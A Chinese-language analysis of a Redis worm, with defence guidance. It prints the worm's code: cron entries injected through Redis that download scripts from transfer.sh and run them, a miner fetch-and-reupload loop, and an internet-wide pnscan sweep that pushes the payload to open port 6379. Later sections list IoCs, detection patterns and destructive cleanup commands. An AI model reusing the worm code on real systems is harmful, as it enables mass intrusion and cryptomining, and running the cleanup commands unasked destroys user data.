Redis蠕虫攻击分析与防御指南<\/h1>

0x00 攻击概述<\/h2>
这是一个通过Redis未授权访问漏洞传播的蠕虫病毒，主要特征如下：<\/p>
攻击目标：暴露在公网的Redis服务（默认端口6379）<\/li>
传播方式：利用Redis未授权访问漏洞进行横向传播<\/li>
攻击载荷：下载并执行挖矿程序，同时传播自身<\/li>
隐蔽性：使用transfer.sh等临时文件分享服务来托管恶意代码，并通过不断更新URL来规避检测<\/li> <\/ol>
0x01 攻击流程分析<\/h2>

初始感染阶段<\/h3>
攻击者通过Redis的set<\/code>命令植入恶意计划任务：<\/p>
set "Backup2" "\t\n*\/5 * * * * wget -O .cmd https:\/\/transfer.sh\/TSAm0\/tmp.aLCyXcGXsL && bash .cmd\n\t"
<\/code><\/pre>
这个命令会在目标系统的crontab中设置一个每5分钟执行一次的恶意任务，从transfer.sh下载并执行恶意脚本。<\/p>
恶意脚本执行流程<\/h3>


下载端口扫描工具<\/strong>：<\/p>
if<\/span> ! (<\/span> [<\/span> -x \/usr\/local\/bin\/pnscan ]<\/span> ||<\/span> [<\/span> -x \/usr\/bin\/pnscan ]<\/span> )<\/span> ; then<\/span>
<\/span><\/span>  curl -kLs https:\/\/codeload.github.com\/ptrrkssn\/pnscan\/tar.gz\/v1.12 > .x112 ||<\/span> wget -q -O .x112 https:\/\/codeload.github.com\/ptrrkssn\/pnscan\/tar.gz\/v1.12
<\/span><\/span>  sleep 1<\/span>
<\/span><\/span>  [<\/span> -f .x112 ]<\/span> &&<\/span> tar xf .x112 &&<\/span> cd pnscan-1.12 &&<\/span> make lnx &&<\/span> make install &&<\/span> cd .. &&<\/span> rm -rf pnscan-1.12 .x112
<\/span><\/span>fi<\/span>
<\/span><\/span><\/code><\/pre>检查系统是否已安装pnscan端口扫描器，如果没有则从GitHub下载并编译安装。<\/p>
<\/li>

下载并执行挖矿程序<\/strong>：<\/p>
tname=<\/span>$(<\/span>mktemp)<\/span>
<\/span><\/span>OMURL=<\/span>https:\/\/transfer.sh\/REIoK\/tmp.pAuTRGMlGy
<\/span><\/span>curl -s $OMURL > $tname ||<\/span> wget -q -O $tname $OMURL
<\/span><\/span><\/code><\/pre>从transfer.sh下载挖矿程序到临时文件。<\/p>
<\/li>

上传挖矿程序获取新URL<\/strong>：<\/p>
NMURL=<\/span>$(<\/span>curl -s --upload-file $tname https:\/\/transfer.sh)<\/span>
<\/span><\/span>mv $tname .gpg &&<\/span> chmod +x .gpg &&<\/span> .\/.gpg &&<\/span> rm -rf .gpg
<\/span><\/span>[<\/span> -z "<\/span>$NMURL"<\/span> ]<\/span> &&<\/span> NMURL=<\/span>$OMURL
<\/span><\/span><\/code><\/pre>将挖矿程序上传到transfer.sh获取新的下载URL，然后执行挖矿程序。<\/p>
<\/li>

生成新的恶意脚本<\/strong>：<\/p>
ncmd=<\/span>$(<\/span>basename $(<\/span>mktemp))<\/span>
<\/span><\/span>sed 's|'<\/span>"<\/span>$OMURL"<\/span>'|'<\/span>"<\/span>$NMURL"<\/span>'|g'<\/span> < .cmd > $ncmd
<\/span><\/span>NSURL=<\/span>$(<\/span>curl -s --upload-file $ncmd https:\/\/transfer.sh)<\/span>
<\/span><\/span><\/code><\/pre>替换脚本中的挖矿程序URL为新的URL，然后上传新脚本获取新的下载URL。<\/p>
<\/li>

构造Redis攻击载荷<\/strong>：<\/p>
echo 'flushall'<\/span> > .dat
<\/span><\/span>echo 'config set dir \/var\/spool\/cron'<\/span> >> .dat
<\/span><\/span>echo 'config set dbfilename root'<\/span> >> .dat
<\/span><\/span>echo 'set Backup1 "\t\n*\/2 * * * * curl -s '<\/span>${<\/span>NSURL}<\/span>' > .cmd && bash .cmd\n\t"'<\/span> >> .dat
<\/span><\/span>echo 'set Backup2 "\t\n*\/5 * * * * wget -O .cmd '<\/span>${<\/span>NSURL}<\/span>' && bash .cmd\n\t"'<\/span> >> .dat
<\/span><\/span>echo 'set Backup3 "\t\n*\/10 * * * * lynx -source '<\/span>${<\/span>NSURL}<\/span>' > .cmd && bash .cmd\n\t"'<\/span> >> .dat
<\/span><\/span>echo 'save'<\/span> >> .dat
<\/span><\/span>echo 'config set dir \/var\/spool\/cron\/crontabs'<\/span> >> .dat
<\/span><\/span>echo 'save'<\/span> >> .dat
<\/span><\/span>echo 'exit'<\/span> >> .dat
<\/span><\/span><\/code><\/pre>构造Redis命令序列，用于感染其他Redis服务器。<\/p>
<\/li>
<\/ol>
传播阶段<\/h3>

使用pnscan扫描目标网络<\/strong>：
pnx=<\/span>pnscan
<\/span><\/span>[<\/span> -x \/usr\/local\/bin\/pnscan ]<\/span> &&<\/span> pnx=<\/span>\/usr\/local\/bin\/pnscan
<\/span><\/span>[<\/span> -x \/usr\/bin\/pnscan ]<\/span> &&<\/span> pnx=<\/span>\/usr\/bin\/pnscan
<\/span><\/span>
<\/span><\/span>for<\/span> x in $(<\/span>seq 1<\/span> 224<\/span> | sort -R)<\/span>; do<\/span>
<\/span><\/span>  for<\/span> y in $(<\/span>seq 0<\/span> 255<\/span> | sort -R)<\/span>; do<\/span>
<\/span><\/span>    $pnx -t512 -R '6f 73 3a 4c 69 6e 75 78'<\/span> -W '2a 31 0d 0a 24 34 0d 0a 69 6e 66 6f 0d 0a'<\/span> $x.$y.0.0\/16 6379<\/span> > .r.$x.$y.o
<\/span><\/span>    awk '\/Linux\/ {print $1, $3}'<\/span> .r.$x.$y.o > .r.$x.$y.l
<\/span><\/span>    while<\/span> read -r h p; do<\/span>
<\/span><\/span>      cat .dat | redis-cli -h $h -p $p --raw &
<\/span><\/span>    done<\/span> < .r.$x.$y.l
<\/span><\/span>  done<\/span>
<\/span><\/span>done<\/span>
<\/span><\/span><\/code><\/pre>随机扫描1-224.x.0.0\/16网段的6379端口，发现开放的Redis服务后发送攻击载荷。<\/li>
<\/ol>
0x02 攻击特征(IoC)<\/h2>


文件特征<\/strong>：<\/p>

蠕虫脚本：.cmd<\/code><\/li>
挖矿程序：.gpg<\/code><\/li>
挖矿程序MD5：2918ee2b69bc4e6b581c7b25f08434fe<\/code><\/li>
<\/ul>
<\/li>

网络特征<\/strong>：<\/p>

初始下载URL：https:\/\/transfer.sh\/TSAm0\/tmp.aLCyXcGXsL<\/code><\/li>
端口扫描器下载：https:\/\/codeload.github.com\/ptrrkssn\/pnscan\/tar.gz\/v1.12<\/code><\/li>
连接Redis默认端口6379<\/li>
<\/ul>
<\/li>

进程特征<\/strong>：<\/p>

异常的计划任务（cron）条目<\/li>
异常的pnscan<\/code>或redis-cli<\/code>进程<\/li>
<\/ul>
<\/li>
<\/ol>
0x03 防御措施<\/h2>
预防措施<\/h3>


Redis安全配置<\/strong>：<\/p>

设置Redis密码认证（requirepass）<\/li>
修改默认端口（6379）<\/li>
禁用危险命令：rename-command FLUSHALL ""<\/code><\/li>
绑定指定IP：bind 127.0.0.1<\/code>（仅本地访问）<\/li>
以非root用户运行Redis<\/li>
<\/ul>
<\/li>

系统加固<\/strong>：<\/p>

定期更新系统和Redis到最新版本<\/li>
配置防火墙规则，限制Redis端口的访问<\/li>
禁用不必要的计划任务<\/li>
监控\/var\/spool\/cron\/目录的异常修改<\/li>
<\/ul>
<\/li>
<\/ol>
检测方法<\/h3>


检查异常文件<\/strong>：<\/p>
find \/ -name ".cmd"<\/span> -o -name ".gpg"<\/span> -o -name ".x112"<\/span>
<\/span><\/span><\/code><\/pre><\/li>

检查异常进程<\/strong>：<\/p>
ps aux | grep -E "pnscan|redis-cli|\.gpg"<\/span>
<\/span><\/span><\/code><\/pre><\/li>

检查异常计划任务<\/strong>：<\/p>
crontab -l
<\/span><\/span>ls -la \/var\/spool\/cron\/
<\/span><\/span><\/code><\/pre><\/li>

检查Redis日志<\/strong>：<\/p>
grep -E "config set dir|config set dbfilename|flushall"<\/span> \/var\/log\/redis\/redis.log
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
清除方法<\/h3>


删除恶意文件<\/strong>：<\/p>
rm -f \/usr\/local\/bin\/pnscan \/usr\/bin\/pnscan
<\/span><\/span>rm -f \/.cmd \/.gpg \/.x112
<\/span><\/span><\/code><\/pre><\/li>

清理恶意计划任务<\/strong>：<\/p>
crontab -r
<\/span><\/span>rm -f \/var\/spool\/cron\/root \/var\/spool\/cron\/crontabs\/root
<\/span><\/span><\/code><\/pre><\/li>

重启Redis服务<\/strong>：<\/p>
systemctl restart redis
<\/span><\/span><\/code><\/pre><\/li>

检查并清理持久化文件<\/strong>：<\/p>
rm -f \/var\/lib\/redis\/dump.rdb
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
0x04 总结<\/h2>
该Redis蠕虫利用未授权访问漏洞进行传播，具有以下特点：<\/p>

使用transfer.sh等临时文件托管服务来托管恶意代码，增加检测难度<\/li>
通过不断更新URL来规避基于固定IoC的检测<\/li>
使用pnscan进行高效的端口扫描和传播<\/li>
通过修改计划任务实现持久化<\/li>
<\/ol>
防御此类攻击的关键在于：<\/p>

加强Redis的安全配置<\/li>
限制Redis端口的网络访问<\/li>
实施严格的权限控制<\/li>
建立有效的监控机制<\/li>
<\/ul>